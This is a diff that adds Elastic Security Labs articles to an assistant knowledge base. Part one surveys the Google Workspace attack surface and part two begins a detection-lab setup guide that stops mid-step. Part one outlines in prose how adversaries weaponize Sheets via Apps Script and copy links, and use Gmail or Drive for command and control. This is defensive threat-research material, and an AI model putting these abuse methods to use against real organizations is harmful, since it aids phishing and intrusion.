+# Conclusion: Reflecting on the data analysis journey
+
+As we conclude, it's valuable to reflect on the territory we've navigated in analyzing cyber threat data. This journey involved several key stages, each contributing significantly to our final insights.
+
+## Journey through Google's Cloud ecosystem
+
+Our path took us through several Google Cloud services, including GCP, GCE, Colab Notebooks, and Google Workspace. Each played a pivotal role:
+
+**Data exploration:** We began with a set of cyber-related questions we wanted to answer and explored what vast datasets we had available to us. In this blog, we focused solely on telemetry being available in BigQuery.
+**Data extraction:** We began by extracting raw data, utilizing BigQuery to efficiently handle large volumes of data. Extraction occurred in both BigQuery and from within our Colab notebooks.
+**Data wrangling and processing:** The power of Python and the pandas library was leveraged to clean, aggregate, and refine this data, much like a chef skillfully preparing ingredients.
+**Trend analysis:** We then performed trend analysis on our reformed datasets with several methodologies to glean valuable insights into adversary tactics, techniques, and procedures over time.
+**Reduction:** Off the backbone of our trend analysis, we aggregated our different datasets by targeted data points in preparation for presentation to stakeholders and peers.
+**Transition to presentation:** The ease of moving from data analytics to presentation within a web browser highlighted the agility of our tools, facilitating a seamless workflow.
+
+## Modularity and flexibility in workflow
+
+An essential aspect of our approach was the modular nature of our workflow. Each phase, from data extraction to presentation, featured interchangeable components in the Google Cloud ecosystem, allowing us to tailor the process to specific needs:
+
+**Versatile tools:** Google Cloud Platform offered a diverse range of tools and options, enabling flexibility in data storage, analysis, and presentation.
+**Customized analysis path:** Depending on the specific requirements of our analysis, we could adapt and choose different tools and methods, ensuring a tailored approach to each dataset.
+**Authentication and authorization:** Due to our entities being housed in the Google Cloud ecosystem, access to different tools, sites, data, and more was all painless, ensuring a smooth transition between services.
+
+## Orchestration and tool synchronization
+
+The synergy between our technical skills and the chosen tools was crucial. This harmonization ensured that the analytical process was not only effective for this project but also set the foundation for more efficient and insightful future analyses. The tools were used to augment our capabilities, keeping the focus on deriving meaningful insights rather than getting entangled in technical complexities.
+
+In summary, this journey through data analysis emphasized the importance of a well-thought-out approach, leveraging the right tools and techniques, and the adaptability to meet the demands of cyber threat data analysis. The end result is not just a set of findings but a refined methodology that can be applied to future data analysis endeavors in the ever-evolving field of cybersecurity.
+
+# Call to Action: Embarking on your own data analytics journey
+
+Your analytical workspace is ready! What innovative approaches or experiences with Google Cloud or other data analytics platforms can you bring to the table? The realm of data analytics is vast and varied, and although each analyst brings a unique touch, the underlying methods and principles are universal.
+
+The objective is not solely to excel in your current analytical projects but to continually enhance and adapt your techniques. This ongoing refinement ensures that your future endeavors in data analysis will be even more productive, enlightening, and impactful. Dive in and explore the world of data analytics with Google Cloud!
+
+We encourage any feedback and engagement for this topic! If you prefer to do so, feel free to engage us in Elastic’s public [#security](https://elasticstack.slack.com/archives/C018PDGK6JU) Slack channel.
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/google_workspace_attack_surface_part_one.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/google_workspace_attack_surface_part_one.md
new file mode 100644
index 0000000000000..230f8c1e0b21f
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/google_workspace_attack_surface_part_one.md
@@ -0,0 +1,191 @@
+---
+title: "Google Workspace Attack Surface"
+slug: "google-workspace-attack-surface-part-one"
+date: "2023-01-03"
+subtitle: "Part One: Surveying the Land"
+description: "During this multipart series, we’ll help you understand what GW is and some of the common risks to be aware of, while encouraging you to take control of your enterprise resources."
+author:
+  - slug: terrance-dejesus
+image: "photo-edited-01-e.jpg"
+category:
+tags:
+  - threat detection
+  - cloud security
+  - google workspace
+  - google cloud
+---
+
+# Preamble
+
+Formerly known as GSuite, Google Workspace (GW) is a collection of enterprise tools offered by Google. Popular services such as Google Drive, Gmail and Google Forms are used by many small and midsize businesses (SMBs), as well as larger organizations.
+
+When referring to security, GW is often mentioned because a threat is abusing or targeting services and resources. As practitioners, it is essential we consider risks associated and plan defenses accordingly. Importantly, Microsoft and Amazon offer some of the same services: if there’s a “least risk” option among them we haven’t seen evidence of it yet, and each prioritizes their own form of visibility.
+
+During this multipart series, we’ll help you understand what GW is and some of the common risks to be aware of, while encouraging you to take control of your enterprise resources: - Part One - Surveying the Land - Part Two - Setup Threat Detection with Elastic - Part Three - Detecting Common Threats
+
+In this publication, readers will learn more about common resources and services in GW and how these are targeted by threats. This will provide an overview of administration, organizational structures, identity access and management (IAM), developer resources, and a few other topics you should think about.
+
+But before we begin, let’s highlight the importance of organizations also taking ownership of this attack surface. If you’re using these enterprise tools and don’t consider them part of your enterprise, that is the challenge to overcome first. Know where your visibility extends to, know which capabilities you can exercise within that range, and don’t mistake vendor-operated for vendor-secured.
+
+# Common Services Targeted by Threats
+
+[Services and applications](https://workspace.google.com/features/) available in GW include cloud storage, email, identity and access management (IAM), chat and much more. Behind the scenes, [developers](https://developers.google.com/workspace) can access application programming interfaces (APIs) to interact programmatically with GW. Together, these services allow organizations of all sizes to provide users with their own Internet-accessible virtual “workspace”. However, threat actors have discovered trivial and advanced methods to abuse these services. While there is plenty of information to cover, we should start with administration as it provides an overview of GW and will help set the stage for more in-depth context about applications or developer resources.
+
+## Administration
+
+Few GW users are aware of the admin console or the settings it exposes, unless they happen to also be an administrator. The admin console is the central command center for GW administrators to manage the services and resources of their organization. The term “organization” is directly referenced by the primary domain registered with GW and therefore is the root node of GW. Only user accounts with administrative roles can sign-in and access their organization’s admin console.
+
+![Snippet of GW home page](/assets/images/google-workspace-attack-surface-part-one/image1.jpg)
+
+GW employs a directory service-like structure that defines users, groups, organizational units (OUs), roles and other attributes of the enterprise for easy navigation. While the admin console is not inherently a risk, compromised valid accounts ([T1078.004](https://attack.mitre.org/techniques/T1078/004/)) with that level of privilege expose organizations to greater risk.
+
+Aside from IAM, administrators use the admin console to manage applications available to their organization. The most popular of these being Gmail, Drive and Docs, Google Meet, Google Forms, Google Sheets and Calendar. Additional Google services can be added, though most are enabled by default when setting up your GW; such as Chrome Remote Desktop. Depending on the OU configuration, permissions for users to these applications may be inherited from the root OU. The principles of least privilege (PoLP) and application control are critical to reducing organizational risk within GW.
+
+![Snippet of GW Applications and Inheritance](/assets/images/google-workspace-attack-surface-part-one/image6.png)
+
+Administrators can also manage mobile and endpoint device enrollment, as well as network related settings from the admin console. Administrators can add devices by uploading a CSV containing the serial number, which can be assigned to a user. For corporate-owned devices, this provides convenient auditing that may unfortunately become necessary. Universal settings for mobile devices are also available, allowing data and setting synchronization for iOS, Android and Google devices. GW allows mobile device management (MDM), allowing admins to apply local changes using [Open Mobile Alliance - Uniform Resources](https://learn.microsoft.com/en-us/troubleshoot/mem/intune/deploy-oma-uris-to-target-csp-via-intune) (OMA-URIs).
+
+Coincidentally, making changes to remote enterprise endpoints is also a popular goal of adversaries.
+
+GW admins have the capability to create and manage Wi-Fi, Ethernet, VPN and Cellular networks. For cellular devices this is typically done via the Subscription Management Root-Discovery Service (SM-DP) which is used to connect eSIM devices to a mobile network. VPN and proxy settings can be configured as well with routing through Google’s DNS infrastructure by default or custom routing if chosen.
+
+Windows endpoints can also be managed via GW, with the capability to modify settings and synchronize data with Active Directory (AD) or an existing LDAP server. This is accomplishable with GW’s [Google Cloud Directory Sync](https://support.google.com/a/answer/106368?hl=en) (GCDS). Settings can be applied to each endpoint, such as BitLocker, automatic updates or authentication via [Google Credential Provider for Windows](https://support.google.com/a/answer/9250996?hl=en) (GCPW). GCPW allows users to login to a Windows endpoint with their Google account for authentication. Users with sufficient privileges can make changes to remote enterprise endpoints by configuring a [custom policy](https://support.google.com/a/answer/10181140#zippy=%2Cwindows-device-management%2Ccustom-settings) through the configuration service provider (CSP). This is possible with the Windows 10 enterprise platform, which exposes endpoint configuration settings that allow GW, as a MDM service to read, set, modify or delete configuration settings. Microsoft has an [extensive list](https://learn.microsoft.com/en-us/windows/configuration/provisioning-packages/how-it-pros-can-use-configuration-service-providers#a-href-idbkmk-csp-docahow-do-you-use-the-csp-documentation) of CSP settings that are exposed for management via custom policies. While integration between platforms is important to daily operations, this service equips adversaries with the capability to expand their intrusion into the Windows ecosystem.
+
+## Organizational Structure
+
+The digital structure of an enterprise in GCP or GW is often hierarchical: where the registered domain is the top-level, parent, or root, and any nested organizations under this are used for the grouping and permission scoping.
+
+An important subject to understand for GW are OUs, which can be thought of as “departments” within an organization and can have subsidiary OUs. The hierarchy starts with a top-level OU, typically from the primary domain registration and organization name where child units can be added as needed. Service and application access are then inherited from the top-level OU if not specified. Users assigned to an OU will have access to any services and resources as inherited.
+
+As an alternative, administrators can create and manage access groups to add an additional layer of resource-based control. Users who are assigned to an access group will inherit access and permissions from those set for the group itself, which may bypass restrictions set on the OU they are assigned to. For example, if an OU for engineering is without access to Drive and Docs, a user is assigned to an access group with access to Drive and Docs can bypass the child OU settings.
+
+![Diagram showing access groups with custom application access than that of the child OU](/assets/images/google-workspace-attack-surface-part-one/image7.png)
+
+GW’s organizational structure and layered approach to access control enables administrators to scope roles easier for users. Unfortunately, incomplete or misconfigured access controls could allow unexpected permission inheritance from the top-level OU. Access restrictions could unexpectedly be bypassed by users outside their expected access groups, thus introducing insider threat risk via additional cloud roles ([T1098.003](https://attack.mitre.org/techniques/T1098/003/)).
+
+## Identity Access and Management
+
+### Identity vs Account
+
+The identity of users when using Google’s services is that of the account being used, often the email address. Identity does differ from user account slightly in that the identity of a user is unique, but the user account is a data structure keeping track of configurations, attributes, activities and more when interacting with Google’s services.
+
+Standalone Gmail addresses (@gmail.com) are consumer accounts typically meant to be used by a private individual, whereas Gmail addresses with a registered domain name are managed user accounts as their lifecycle and configuration are fully managed by the organization. Therefore, when we discuss IAM in this publication, the context is typically towards managed user accounts whose identity and data is managed by the GW organization.
+
+However, the relationship between identity and account does not have to be 1:1, meaning an email address, or identity, can be tied to two separate user accounts. If an organization does not enforce a new and separate identity for their users, risk looms around the private user account whom’s settings are managed by the user themselves, not the organization. In this example, the widespread use of valid compromised accounts undermines the ability of defenders to identify when this is malicious versus benign.
+
+### Machine Accounts
+
+Machine accounts exist and allow developers to interact with Google services and resources programmatically. These are not managed within GW, but rather Google Cloud Platform (GCP) via the use of service accounts. A bridge exists in the form of domain-wide delegation between GW and GCP.
+
+This feature authorizes GCP service accounts to access data, resources, services and much more within GW via application APIs. OAuth2 is the protocol used for authentication between GCP service accounts and GW.
+
+The most common risk of this approach is with the storage and use of service account credentials. Since service accounts often have elevated privileges due to their automation and programmatic intentions, adversaries prioritize finding these credentials, such as a Linux cloud worker. Often, public/private key pairs are stored insecurely for local scripts or programs that use them. Adversaries can then discover the unsecured credentials ([T1552](https://attack.mitre.org/techniques/T1552/)) from a text file, extract them from memory, environment variables or even log files. Once compromised, adversaries have a bridge into GW from GCP with a valid service account that may be monitored less diligently than a user account.
+
+### Roles and Groups
+
+Within GW, role-based access control (RBAC) only exists at the administrative level. This means the default and custom roles can be set up and configured from the admin console, however, the privileges available are mainly administrative. As we discussed earlier, Google’s hierarchy is top-down starting with the root OU, followed by child OUs; resources and services are enabled or disabled on a per-OU basis. By default a non-admin user belongs under the root OU, thus inheriting any access explicitly set at the root level where global privileges should be minimal.
+
+Not to be confused with Google’s Group application, access groups allow administrators to set specific access and privileges to resources and services at the user-level, similar to role-level controls. Typically, a group is created and then privileges to resources and services are assigned. Users are then added as members to those specific groups, overriding or superseding inherited privileges from the OU.
+
+### External Identities
+
+As stated before, Gmail’s email names are unique IDs so users can use the same ID for both their consumer account and managed user accounts with the use of an external identity provider (IdP). This process typically requires single sign-on (SSO) via security assertion markup language (SAML) and therefore the IdP must recognize the identity before they can sign on.
+
+Authentication is relayed from GW to the SAML IdP and relies on trusting the external provider’s identification verification. This is even true for active directory (AD) services or Okta where those become the external authoritative source. Data in transit during the SAML SSO process presents the greatest risk, and intercepted SAML responses to the IdP may be used to authenticate via forged credentials ([T1606.002](https://attack.mitre.org/techniques/T1606/002/)).
+
+## Developer Resources
+
+There are two methods for programmatically interacting with GW: Google [Apps Script](https://workspace.google.com/products/apps-script/)and [REST APIs](https://developers.google.com/workspace). Google Apps Script is an application development platform for fast and easy business applications to better integrate with GW. Whereas, REST APIs provide a direct method of communicating with GW, often in cases where integration is not fast or easy. External interaction with GW is another benefit to REST APIs, as Apps Script is meant for internal use.
+
+### Apps Script
+
+With Apps Script, developers use JavaScript with access to built-in libraries specific to each Google application. The term “rapid” is often emphasized because the platform is available at the domain, script.google.com, and tied directly to the organization the user is logged into, no installation at all. This tool can be extremely useful for accomplishing tasks in GW related to existing applications, administrative settings and more.
+
+![Apps Script code written to create a Google doc and email it to myself](/assets/images/google-workspace-attack-surface-part-one/image5.jpg)
+
+Each coding application you create in Apps Script is known as a project and can be used by other GW tools. Within that project, you write your JavaScript code as you see fit. From its console, you can run, debug or view execution logs.
+
+The project can also be deployed to your GW with versioning control as a web application, API executable, Add-on or Library. Script’s can also be deployed as libraries, making code shareable across projects. Last but not least, triggers can be set for each project where specific functions can be run at specific times allowing developers to choose which code blocks are executed and when.
+
+## Applications
+
+In GW, the main attraction to organizations is typically the abundance of native applications offered by Google. Google’s Drive, Docs, Gmail, Sheets and Forms are just a few that are readily available to users for communication, storage, documentation or data gathering and analysis. All of these applications make up a user’s workspace, but are also targeted by adversaries because of their popularity and seamless integration with each other.
+
+![Prompt](/assets/images/google-workspace-attack-surface-part-one/image8.jpg)
+
+Therefore it is essential to understand that while applications compliment each other in GW, they often require [authorization](https://developers.google.com/apps-script/guides/services/authorization) to each other where access rights have to be explicitly granted by the user. While security practitioners may generally be suspicious of applications requiring access, general users may not and grant access without thinking twice. This then allows malicious applications such as Apps Script functions contained in a Google Sheet, to access the private data behind each application.
+
+### Gmail
+
+Arguably the most popular application provided by GW, Gmail has historically been abused by adversaries as a delivery mechanism for malicious attachments or links. For those unaware, Gmail is Google’s free email service with nearly 1.5 billion active users as of 2018, according to a statista [report](https://www.statista.com/statistics/432390/active-gmail-users/).
+
+Phishing ([T1566](https://attack.mitre.org/techniques/T1566/)) is often the most common technique conducted by adversaries with the help of Gmail, where stealing valid credentials is the goal. Victims are sent emails containing malicious attachments or links where malware may be installed or a user is redirected to a fake website asking for credentials to login. If account compromise occurs, this allows for internal spear phishing ([T1534](https://attack.mitre.org/techniques/T1534/)) attacks, potentially targeted towards an existing administrator.
+
+Email collection ([T1114](https://attack.mitre.org/techniques/T1114/)) is another technique used by adversaries whose modus operandi (MO), may be to simply collect sensitive information. In GW, administrators have privileges to set custom global mail routes for specific users, groups or OUs, whereas users can create their own forwarding rules as well. Capability for an adversary to do so, whether manually or programmatically, comes down to valid account compromise and therefore signs of this activity may be found later in the intrusion process.
+
+Taking Gmail a step further, adversaries may also use GW’s web services ([T1102](https://attack.mitre.org/techniques/T1102/)) for command and control purposes as [identified](https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/) by ESET researchers regarding the ComRAT v4 backdoor of 2020. With attribution pointed towards advanced persistent threat (APT) group, Turla, the abuse of Gmail is also a tool for more advanced threats.
+
+### Drive
+
+[Google Drive](https://workspace.google.com/products/drive/), being a free digital storage service with an active Gmail account, is also a common target by adversaries. Where valid accounts are compromised, adversaries have the capability to steal private data stored in Google Drive. Sharing documents in Google Drive relies on a trust model, where the user can create a custom shareable link and invite others. Administrators have the capability to enable and expose public shared drives from their organization as well. Access and privileges rely on sharing permissions set by the owner or organization and the intended recipient for either the shareable link or Google cloud identity who has access to those shared objects.
+
+Let’s not forget that GW allows administrators to set up enterprise mobility management (EMM) and mobile device management (MDM) for mobile devices. These mobile devices then have access to private shared drives in an organization’s Google drive space. An adversary could take advantage of this to obtain unauthorized access to mobile devices via these remote services ([TA0039](https://attack.mitre.org/tactics/TA0039/)). Geographic coordinates of a mobile device or end user could also be obtained from such services if abused to do so.
+
+Command and control via bidirectional communication ([T1102.002](https://attack.mitre.org/techniques/T1102/002/)) to a Google Drive is another option for adversaries who may be using the service to host and deploy malicious payloads as those from [APT29](https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/). Oftentimes, this reflects compromised web services ([T1584.006](https://attack.mitre.org/techniques/T1584/006/)) simply through a valid account and enabled Google Drive API. This is often the case when adversaries may leverage Google Drive to stage exfiltrated data programmatically prior to its final destination.
+
+### Docs
+
+Integrated with Google Drive is [Google Docs](https://workspace.google.com/products/docs/), a free online word processing service where users can create documents which are then stored in their Google Drive. For collaboration purposes, documents have extensive markup capabilities, such as comments, which have recently been abused to distribute phishing and malware. This technique, [discussed](https://www.avanan.com/blog/google-docs-comment-exploit-allows-for-distribution-of-phishing-and-malware) by Check Point company, Avanan, allows adversaries to simply create a document and add a comment where they include the target’s email address and a malicious link, helping evade spam filters and security tools. Combining this phishing campaign with a native JavaScript application development platform such as Apps Script in GW would allow for expanded distribution with minimal costs. Luckily the extent of malicious Google documents ends with malicious links, but it would be immature to suggest adversaries will not eventually develop new techniques to abuse the service.
+
+### Sheets
+
+As with Google Docs, [Google Sheets](https://workspace.google.com/products/sheets/) is another service often abused by adversaries to deliver malicious links or payloads. Google Sheets is a spreadsheet program, similar to Excel from Microsoft. Automated tasks can be created with the use of macros and of course triggers for those macros to be executed as well. While built-in functions exist, custom functions can be created via Google’s Apps Script platform and then imported into the Google Sheet document itself. Apps Script has native JavaScript libraries for interacting with other Google services and their respectful APIs. Thus if an adversary were to weaponize a Google Sheet document of their liking, resource development starts with a custom function, built with Apps Script. The function is imported into the Google Sheet and then shared with the intended target by commenting their email address and allowing access. Once triggered, the malicious code from the function would be executed and continue the intrusion process.
+
+A step further may be to share with them a [copy link](https://support.google.com/a/users/answer/9308866?hl=en), rather than an edit link which would copy the sheet containing the malicious macro to their own Google drive and upon execution carry out the intended task as the user since the sheet’s owner is now the target. For distribution, access to a user’s contacts within their GW organization, may allow worm-like capabilities as [discovered](https://nakedsecurity.sophos.com/2017/05/05/google-phish-thats-a-worm-what-happened-and-what-to-do/) by Sophos in 2017.
+
+## Marketplace
+
+GW’s [marketplace](https://apps.google.com/supportwidget/articlehome?hl=en&article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F172391%3Fhl%3Den&product_context=172391&product_name=UnuFlow&trigger_context=a) is an online application store with additional enterprise applications that can be integrated into an organization and accessed by users. Administrators are responsible for managing application accessibility and surveying risk associated with such apps. A large portion of these applications are 3rd-party and Google clearly states their [policies](https://developers.google.com/workspace/marketplace/terms/policies) for being a contributor. The risk associated with 3rd-party applications in the GW marketplace is access to private data from information repositories ([T1213](https://attack.mitre.org/techniques/T1213/)) or the resident data of the user and/or organization behind each application.
+
+Granted for administrators, when browsing applications, permission access can be reviewed via the application itself prior to installation. This way, administrators can review whether the risk inherited from such access is worth the solution it potentially may provide.
+
+![GW access request example for Signeasy application](/assets/images/google-workspace-attack-surface-part-one/image4.jpg)
+
+## Reporting
+
+As with most cloud consoles and environments, GW has a native reporting feature that helps administrators capture the activity in their environment. Located in the admin console of GW under Reporting, administrators have the following options.
+
+- Highlights - Dashboard of basic metrics for GW environments
+- Reports - Apps, cost, user and devices reporting in the form of basic dashboard metrics or tabled data about user accounts
+- Audit and Investigation - Location of all logs, categorized by activity
+- Manage Reporting Rules - Redirection to rules space, filtering on “Reporting” rules which are custom
+- Email Log Search - Search across the Gmail accounts of all users within the organization. Filters include Date, Sender, Sender IP, Recipient, Recipient IP, Subject and Message ID
+- Application Uptime - Uptime for applications enabled in the GW. Uptime is relative to Google’s infrastructure.
+
+Of this reporting, Google does a decent job of providing tabular data about user status and account activity in GW such as 2-step verification status and password strength, as well as additional security metrics. For example, shared links to Google resources that have been accessed outside of the domain. Additional user report documentation from Google can be found [here](https://apps.google.com/supportwidget/articlehome?hl=en&article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F4580176%3Fhl%3Den&product_context=4580176&product_name=UnuFlow&trigger_context=a).
+
+The most reliable data is GW’s native logging, found under “Audit and Investigation”. As stated prior, these logs are organized into their own separate folders based on activity, application, identity or resource.
+
+![Admin log events from GW reporting](/assets/images/google-workspace-attack-surface-part-one/image9.png)
+
+Logs are stored in a tabular format with date, event, description, actor and IP address all being recorded by default. The description contains another layer of verbosity as to what activity occurred, oftentimes including JSON key and value pairs for specific values pulled from the GW for reporting.
+
+In regards to threats, often adversaries will attempt indicator removal ([T1070](https://attack.mitre.org/techniques/T1070/)) by clearing audit logs to remove any potential footprints, however, GW audit logs are managed by Google and have [retention policies](https://apps.google.com/supportwidget/articlehome?hl=en&article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F7061566%3Fhl%3Den&product_context=7061566&product_name=UnuFlow&trigger_context=a) only. Therefore, it is essential to route audit logs from GW to an on-premise or cloud storage solution such as GCP via storage buckets. For more information on how Elastic’s GW integration routes audit logs, visit [here](https://docs.elastic.co/en/integrations/google_workspace).
+
+## Rules
+
+While GW provides a reporting feature that focuses on logging activity within an organization’s digital environment, it also has a detection rules feature as well.
+
+These are not directly marketed as a security information and event management (SIEM) tool, but resemble that functionality. Shipped with some default rules, the “Rules” feature in GW allows administrators to automatically monitor for specific activity and set specific actions. Each rule allows you to customize the conditions for the rule to match on and of course what actions to perform when conditions are met. Rules are broken down into reporting, activity, data protection, system defined, or trust rules where custom creation and viewing require specific privileges.
+
+![Administrator view of existing rules](/assets/images/google-workspace-attack-surface-part-one/image10.png)
+
+In regards to granularity, administrators are at the mercy of data sourced from the audit logs when creating custom rules, whereas system defined rules provided by Google have additional data source insight. Rule alerts are directly accessible via the security alert center feature in GW, where further analysis, assignment, status and more can be edited.
+
+![User suspended alert in GW](/assets/images/google-workspace-attack-surface-part-one/image3.jpg)
+
+## Conclusion
+
+With this introduction to GW as an attack surface, we hope you better understand the risks associated with these enterprise resources. Powerful virtual workspaces have become an essential capability of distributed productivity, which both establishes their utility and exposes them to threats. As adversaries continue to abuse GW, enterprises would be well-advised to understand its security while taking ownership of improving it. Proper administration, strong policy settings, IAM, and using the visibility they have are some of the recommendations we would offer.
+
+Soon we’ll release part two in this series and show you have to setup a threat detection lab for GW with Elastic components. And in our third publication, we’ll explore in-depth attack scenarios that reveal specific defensive strategies aligned to success.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/google_workspace_attack_surface_part_two.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/google_workspace_attack_surface_part_two.md
new file mode 100644
index 0000000000000..7f9cae1672c11
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/google_workspace_attack_surface_part_two.md
@@ -0,0 +1,402 @@
+---
+title: "Google Workspace Attack Surface"
+slug: "google-workspace-attack-surface-part-two"
+date: "2023-01-03"
+subtitle: "Part Two: Setup Threat Detection With Elastic"
+description: "During part two of this multipart series, we’ll help you understand how to setup a GW lab for threat detection and research."
+author:
+  - slug: terrance-dejesus
+image: "photo-edited-01-e.jpg"
+category:
+tags:
+  - threat detection
+  - cloud security
+  - google workspace
+  - google cloud
+---
+
+# Preamble
+
+As a continuation of this series about Google Workspace’s (GW) attack surface, we diverge from surveying the land and focus on setting up a threat detection lab with Elastic. In [part one](https://www.elastic.co/security-labs/google-workspace-attack-surface-part-one), we explored the important resources and capabilities of GW, while tracking intrusion techniques that adversaries may leverage. In part two, we will give you the foundation needed to begin researching threats targeting GW, and provide resources for detecting those threats using Elastic technologies. The information used during the steps provided should be adjusted for your own lab and testing environment. If you do not feel the need to set up your own lab, that’s fine as this includes examples showing you how we detect threats to GW.
+
+Following this will be part three of this series, in which we cover common intrusion techniques by emulating the GW environment and simulating threat activity. In doing so, we’ll build detection logic to further detect several common techniques.
+
+Elastic resources will be freely available but a registered domain for GW is necessary and will be covered in the upcoming steps, strictly for maximum authenticity. Approximate lab setup time is 20-30 minutes.
+
+## Let’s Get You Up to Speed
+
+For those who may not be familiar with Elastic’s current stack: take a few minutes to review the current [solutions](https://www.elastic.co/blog/category/solutions) it offers. In short, the stack is an all-encompassing product that can be deployed anywhere from a single interface! If you would like to explore more information about the Elastic security solution, the [documentation](https://www.elastic.co/guide/en/security/current/getting-started.html) is a great starting point.
+
+In this article, we will focus specifically on the security solution which includes a robust detection engine and 600+ pre-built threat [detection rules,](https://github.com/elastic/detection-rules/tree/main/rules) an endpoint agent that can be deployed to Windows, Linux, or macOS endpoints and collect data from various on-premise and cloud environments, as well as detect and prevent threats in real-time. Not to mention, this endpoint behavior logic is also all public in our [protections artifacts](https://github.com/elastic/protections-artifacts) repository.
+
+Our endpoint agent orchestrator, [Fleet](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html), is manageable from the Kibana interface in the Elastic Stack. Fleet allows us to set up and deploy security policies to our endpoint agents. These policies are extremely customizable, thanks to an extensive list of supported [Integrations](https://www.elastic.co/integrations/).
+
+Think of an Integration as a module for the Elastic Agent that provides processors to collect specific data. When added to our security policy, an Integration allows the Elastic Agent to ingest logs, apply our Elastic Common Schema (ECS), and store them in the Elastic Stack for searching or to trigger alerts. If you're curious about a specific integration Elastic has, you can search for it [here](https://www.elastic.co/integrations/data-integrations)!
+
+With this information you could almost assume the Elastic Stack allows you to manage all of this with just one information technology (IT) guy.
+
+![](/assets/images/google-workspace-attack-surface-part-two/ned.jpeg)
+
+Either way, our goal is to create a threat detection lab for [Google Workspace](https://docs.elastic.co/en/integrations/google_workspace) as depicted in this diagram:
+
+![Simple architecture layout and process workflow](/assets/images/google-workspace-attack-surface-part-two/image14.png)
+
+The process of setting this up is pretty straightforward. Note that your environment does not have to be cloud-focused; if you prefer to do everything locally, you are more than welcome to. The [Elastic Container Project](https://www.elastic.co/security-labs/the-elastic-container-project) is a great resource for a local Docker build of the stack.
+
+## Sign-Up for Google Workspace
+
+In order for you to use GW, you must have a registered Google account email address and organization. If you already have a GW setup for an organization, login to the [admin console](https://admin.google.com/) and continue to Create a Project in Google Cloud. This process will not go into detail about creating a Google account.
+
+Once created, do the following:
+
+1. Visit [https://workspace.google.com](https://workspace.google.com) \> Get Started
+2. Fill out the information requested in subsequent steps
+3. Business name: DeJesus’ Archeology
+4. Number of employees: 2-9
+5. Region: United States
+
+For this lab, we will use DeJesus’ Archeology as a business name because it's memorable (also who didn't want to be an archeologist growing up?). We'll be digging up more recent evidence in these logs than we would from the earth, of course.
+
+Eventually you will be asked, “Does your business have a domain?”. GW requires you to have your own domain name to use its services, especially the admin console for an organization. For today, we will select “No, I need one” and will use dejesusarcheology.com, but please select or use your own. From here, you will need to enter additional business information to register your domain and organization.
+
+You will need a username to sign into your GW account and create your business email address. We'll use [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com) as the administrative email. When finished, continue to login to your GW admin console with your new email where you should be greeted by a similar interface below.
+
+![Default page for GW admin console after login](/assets/images/google-workspace-attack-surface-part-two/image25.jpg)
+
+## Setup Google Cloud Platform (GCP)
+
+For the Elastic agent to ingest GW logs, it relies solely on making requests to the [Reports API](https://developers.google.com/admin-sdk/reports/reference/rest) and therefore, we need to leverage GCP for a managed service account. This service account’s credentials will be used by our Elastic agent to then leverage the admin SDK API for pulling logs from GW’s Reports API into the Elastic Stack. Domain-wide delegation and OAuth2 are important for authentication and resource access but will be enabled through steps later on.
+
+### Create a Project
+
+GCP is hierarchical, so we must first create a project. If you already have a GCP environment setup, we recommend creating a new project that links to your GW via the registered domain by following similar steps below.
+
+Complete the following steps:
+
+1. Log into [Google Cloud](https://console.cloud.google.com/)with the same Google account used to setup GW
+2. Select the following: Select a project \> New Project
+3. Enter the following information described in subsequent steps
+4. Project name: dejesus-archeology
+5. Organization: dejesusarcheology.com
+6. Location: dejesusarcheology.com
+
+When done, you should have a new organization and project in GCP. By default, only the creator of the project has rights to manage the project.
+
+![Project dashboard in Google Cloud](/assets/images/google-workspace-attack-surface-part-two/image19.jpg)
+
+### Enable Admin SDK API
+
+Our Elastic agent will eventually use our GCP service account, which uses the [Workspace Admin SDK](https://developers.google.com/admin-sdk) to interact with the GW admin console REST API, therefore it needs to be enabled in GCP. To keep your mind at ease, we will only be enabling read access to the Reports API for this admin SDK.
+
+Complete the following steps:
+
+- Select the Google Cloud navigation menu \> APIs & Services \> Enabled APIs & Services
+- Search and enable “Admin SDK API” from the API library page
+
+When finished, you will have enabled the Admin SDK API within your project, where your service account will have access to pull data from GW.
+
+![Admin SDK API enabled in GCP](/assets/images/google-workspace-attack-surface-part-two/image23.jpg)
+
+### Configure OAuth Consent Screen
+
+We next need to set up the [OAuth consent screen](https://developers.google.com/workspace/guides/configure-oauth-consent) for our service account and application when they create API requests to GW, as it will include the necessary authorization token.
+
+Complete the following steps:
+
+1. Select the Google Cloud navigation menu \> APIs & Services \> Enabled APIs & Services \> OAuth Consent Screen
+2. User Type \> Internal \> Create
+3. Fill out the following information in subsequent steps
+4. App name: elastic-agent
+5. User support email: [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com)
+6. Authorized domains: dejesusarcheology.com
+7. Developer contact information: [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com)
+8. Save and Continue
+9. Save and Continue
+10. Back to Dashboard
+
+![OAuth consent screen setup for application in GCP](/assets/images/google-workspace-attack-surface-part-two/image7.jpg)
+
+When finished, we will now have a registered application using OAuth 2.0 for authorization and the consent screen information set. Please note, the default token request limit for this app daily is 10,000 but can be increased. We recommend setting your Elastic agent’s pull rate to every 10 minutes which should not come close to this reaching this threshold. Setting the agent’s pull rate will be done at a later step.
+
+### Create a Service Account
+
+For the Elastic agent to ingest data from GW, we will need to create a [service account](https://cloud.google.com/iam/docs/service-accounts) for the agent to use. This account is meant for non-human applications, allowing it to access resources in GW via the Admin SDK API we enabled earlier.
+
+To create a service account, do the following:
+
+1. Select the navigation menu in Google Cloud \> APIs & Services \> Credentials \> Create Credentials \> Service Account
+2. Enter the following information:
+3. Service account name: elastic-agent
+4. Service account ID: elastic-agent
+5. Leave the rest blank and continue
